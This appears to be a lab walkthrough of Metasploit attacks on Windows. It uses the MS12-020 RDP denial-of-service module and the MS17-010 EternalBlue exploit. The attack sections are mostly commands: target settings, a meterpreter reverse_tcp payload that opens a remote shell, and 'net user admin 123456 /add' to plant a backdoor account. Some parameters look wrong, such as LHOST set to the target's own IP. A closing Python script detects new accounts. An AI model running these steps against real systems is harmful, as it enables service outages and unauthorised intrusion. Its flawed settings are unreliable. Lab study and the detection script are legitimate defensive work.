MS12-020
First switch to the root user:

```
su root
```

Enter the Metasploit framework (msf) from the terminal:

```
msfconsole
```
![image-20210429232434694](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010719096-323077406.png)
Search for the vulnerability:

```
search 12_020
```
![image-20210429232504111](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010718558-648762964.png)
Select the module for this vulnerability:

```
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
```
![image-20210429233413974](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010718147-1281105957.png)
Show the module's options:

```
show options
```
![image-20210429233426606](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010717810-442691408.png)
On the target machine, look up its IP address:

```
ipconfig
```
![image-20210429233806813](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010717519-774864518.png)
On the target machine, list the open ports:

```
netstat -ano
```
![image-20210429235403692](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010717167-1661590980.png)
Open port 3389 on the target (enable Remote Desktop). The following screenshots walk through the Windows settings:
![image-20210429235804953](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010716844-1309496832.png)
![image-20210429235947192](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010716362-1737856988.png)
![image-20210430000041630](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010716000-698227711.png)
![image-20210430000114648](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010715548-1813523563.png)
![image-20210430000132952](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010715262-2039754615.png)
![image-20210430000142823](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010714988-1068321919.png)
![image-20210430000221280](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010714733-870204678.png)
![image-20210430001107406](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010714334-1828021266.png)
![image-20210430001142350](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010713820-1608790551.png)
![image-20210430001638674](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010713424-1560750638.png)
Set the parameters:

```
set RHOST 192.168.74.134
set RPORT 3389
```
![image-20210429233952245](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010713097-601215073.png)
Check the settings:

```
show options
```
![image-20210429234046172](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010712784-2082050764.png)
Launch the attack:

```
exploit
```

or, equivalently:

```
run
```
![image-20210430001750923](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010712490-94166863.png)
![image-20210430001944853](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010712133-1213906087.png)
MS17-010
Enter the Metasploit framework (msf) from the terminal:

```
msfconsole
```
![image-20210430002110301](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010711772-1538561741.png)
Search for modules related to MS17-010:

```
search 17_010
```
![image-20210430002257581](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010711363-355499676.png)
Scan the internal network for hosts that are vulnerable:

```
use auxiliary/scanner/smb/smb_ms17_010
show options
```
![image-20210430002355666](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010710966-1151140043.png)
![image-20210430002429892](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010710617-1528419488.png)
Check whether port 445 is open on the target:
![image-20210430002956797](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010710260-2019991417.png)
Set the parameters:

```
set RHOST 192.168.74.134/24
show options
```
![image-20210430002738779](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010709905-547124540.png)
Run the scanner; hosts reported with a plus sign are vulnerable and can be exploited:

```
run
```
![image-20210430004134286](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010709542-607571691.png)
Use an exploit module to break in:

```
search ms17_010
```
![image-20210430004152722](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010709164-731472706.png)
Load the EternalBlue exploit module:

```
use exploit/windows/smb/ms17_010_eternalblue
show options
```
![image-20210430004213005](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010708733-656080131.png)
Set the parameters:

```
set RHOST 192.168.74.134
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.74.134
show options
```
![image-20210430004230669](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010708270-1319515569.png)
Launch the attack:

```
run
```
![image-20210430004412043](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010707734-24502025.png)
Create an admin user:

```
net user admin 123456 /add
```
![image-20210430004437433](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010707068-301001377.png)
Verify on the target machine:

```
net user
```
![image-20210430004521099](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010706592-122296550.png)
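The `net user` check above is also what a defender uses to catch this step: comparing the account list against an approved baseline exposes the newly created `admin` account. The following script is an added example and not part of the original post; the two `net user` outputs it parses are constructed, and the host name `WIN7-TARGET` and the `lab` account are assumptions.

```python
import re

# Constructed sample output of `net user` on a Windows 7 host: an approved
# baseline, and the listing after `net user admin 123456 /add` was run.
# Neither is captured from the original post's target machine.
BASELINE_NET_USER = """\
User accounts for \\\\WIN7-TARGET

-------------------------------------------------------------------------------
Administrator            Guest                    lab
The command completed successfully.
"""

CURRENT_NET_USER = """\
User accounts for \\\\WIN7-TARGET

-------------------------------------------------------------------------------
admin                    Administrator            Guest
lab
The command completed successfully.
"""


def parse_net_user(output: str) -> set[str]:
    """Return the set of local account names listed by `net user`.

    The output is a header, a dashed separator, the account names laid out in
    whitespace-separated columns, and a trailing status line ("The command
    completed successfully." on English Windows, "命令成功完成。" on Chinese
    Windows). Names are read from the lines between the separator and the
    status line. Limitation: account names containing spaces are split.
    """
    names: set[str] = set()
    in_table = False
    for line in output.splitlines():
        if not in_table:
            if re.fullmatch(r"-{5,}", line.strip()):
                in_table = True
            continue
        if re.match(r"^(The command|命令)", line):  # trailing status line
            break
        names.update(line.split())
    return names


def new_accounts(baseline: str, current: str) -> set[str]:
    """Accounts present now that were absent from the approved baseline."""
    return parse_net_user(current) - parse_net_user(baseline)


if __name__ == "__main__":
    for name in sorted(new_accounts(BASELINE_NET_USER, CURRENT_NET_USER)):
        print(f"ALERT: unexpected local account created: {name}")
```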